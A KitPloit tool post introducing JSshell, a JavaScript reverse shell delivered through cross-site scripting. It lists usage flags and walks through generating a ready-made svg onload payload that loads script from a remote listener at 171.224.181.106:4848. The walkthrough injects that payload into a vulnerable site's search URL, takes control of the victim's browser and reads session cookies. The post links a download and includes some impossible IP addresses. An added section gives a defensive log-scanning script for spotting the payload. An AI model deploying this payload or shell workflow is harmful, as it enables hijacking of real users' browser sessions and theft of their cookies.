JSshell is a JavaScript [reverse](<https://www.kitploit.com/search/label/Reverse> "reverse" ) shell. It is used to exploit XSS remotely and to help find blind XSS, ...
This tool works on both Unix and Windows operating systems and runs with both Python 2 and Python 3. It is a big update of JShell, a tool by s0med3v for getting a JavaScript shell through XSS. Unlike other JavaScript shells, JSshell does not require Netcat.
**Usage**
**Generate JS reverse shell payload: `-g`**
**Set the local port number for listening and generating the [payload](<https://www.kitploit.com/search/label/Payload> "payload" ) (by default, it is set to 4848): `-p`**
**Set the local source address for generating the payload (JSshell detects your IP address by default): `-s`**
**Set a timeout for the shell connection (if the user exits the page, the shell is paused; if you set a timeout, the shell closes automatically after a while without a response): `-w`**
**Execute a command when the shell is obtained: `-c`**
**Example usages:**
* `js.py`
* `js.py -g`
* `js.py -p 1234`
* `js.py -s 48.586.1.23 -g`
* `js.py -c "alert(document.cookie)" -w 10`
**An example for running JSshell:**
This is a step-by-step example of exploiting remote XSS using JSshell.
First, we generate a reverse JS shell payload and set the shell timeout to 20 seconds:

    ~# whoami
    root
    ~# ls
    README.md js.py
    ~# python3 js.py -g -w 20
    __
    |(_ _ |_ _ | |
    \_|__)_> | |(/_ | |
    v1.0

    Payload:
    <svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>

    Listening on [any] 4848 for incoming JS shell ...

Now paste this payload into the website (or URL) that is [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> "vulnerable" ) to XSS:
`https://vulnwebs1te.com/b/search?q=<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},1248)>`
Access the page, and we will see that we have got the reverse JS shell:

    __
    |(_ _ |_ _ | |
    \_|__)_> | |(/_ | |
    v1.0

    Payload:
    <svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>

    Listening on [any] 4848 for incoming JS shell ...
    Got JS shell from [75.433.24.128] port 39154 to DESKTOP-1GSL2O2 4848
    $ established
    $ the
    $ shell
    $
    $
    $ help
    JSshell using javascript code as shell commands. Also supports some commands:
    help This help
    exit, quit Exit the JS shell
    $

Now let's execute some commands:

    $ var test = 'hacked'
    $ alert(test)
    $

The browser shows an alert: `hacked`

    $ prompt(document.cookie)
    $

The browser displays the user's cookies: `JSESSION=3bda8...`

    $ exit
    ~# whoami
    root
    ~# pwd
    /home/shelld3v
    ~#

And we have quit!
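
A defender's view of the walkthrough above, as an added example that is not part of JSshell or the original post: the payload travels in the `q` parameter, so it is visible in web server access logs. This Python code percent-decodes each request's query string (including double encoding) and flags the event-handler-plus-script-injection shape of the payload, reporting the callback host; the function names, the log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Shape of the payload shown above: an inline event handler that appends a
# <script> element whose src points at a remote host.
EVENT_HANDLER = re.compile(r"<\s*\w+[\s/]+on\w+\s*=", re.I)
SCRIPT_INJECT = re.compile(r"createElement\(\s*[\"']script[\"']\s*\)", re.I)
REMOTE_SRC = re.compile(r"\.src\s*=\s*[\"'](?:https?:)?//([^\"'/\s]+)", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are normalised."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return a finding for a log line carrying the payload shape, else None."""
    match = REQUEST.search(line)
    if not match:
        return None
    parts = urlsplit(match.group(1))
    query = fully_decode(parts.query)
    if not (EVENT_HANDLER.search(query) and SCRIPT_INJECT.search(query)):
        return None
    src = REMOTE_SRC.search(query)
    return {"client": line.split()[0], "path": parts.path,
            "callback": src.group(1) if src else None}

def scan(lines):
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample log lines (documentation-range addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.20 - - [06/Jun/2020:21:30:00 +0000] "GET /b/search?q=%3Csvg/onload='
    'setInterval(function()%7Bwith(document)body.appendChild(createElement(%22script'
    '%22)).src=%22//203.0.113.7:4848%22%7D,999)%3E HTTP/1.1" 200 512',
    '198.51.100.21 - - [06/Jun/2020:21:31:10 +0000] "GET /b/search?q=%253Csvg%2520'
    'onload%253DappendChild(createElement(%2522script%2522)).src%253D%2522//'
    '203.0.113.7:4848%2522%253E HTTP/1.1" 200 512',
    '198.51.100.22 - - [06/Jun/2020:21:32:45 +0000] "GET /b/search?q=svg+onload+'
    'tutorial HTTP/1.1" 200 498',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Only payloads sent in the URL appear in access logs; input submitted in request bodies needs the same check at the application or WAF layer.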
**Author**
Created by shelld3v, [hacking](<https://www.kitploit.com/search/label/Hacking> "hacking" ) at HackerOne and Bugcrowd with a secret account! This tool is inspired by JShell (s0med3v) and uses the BruteLogic payload. JSshell 2.0 will have some new features, including:
* More payloads for `<img>`, `<script>`, ...
* Some shortcut commands: print the current session, domain, endpoint, ...
* Better GUI
...
**[Download JSshell](<https://github.com/shelld3v/JSshell> "Download JSshell" )**
Source: KitPloit, published 2020-06-06T21:30:00: <http://www.kitploit.com/2020/06/jsshell-javascript-reverse-shell-for.html>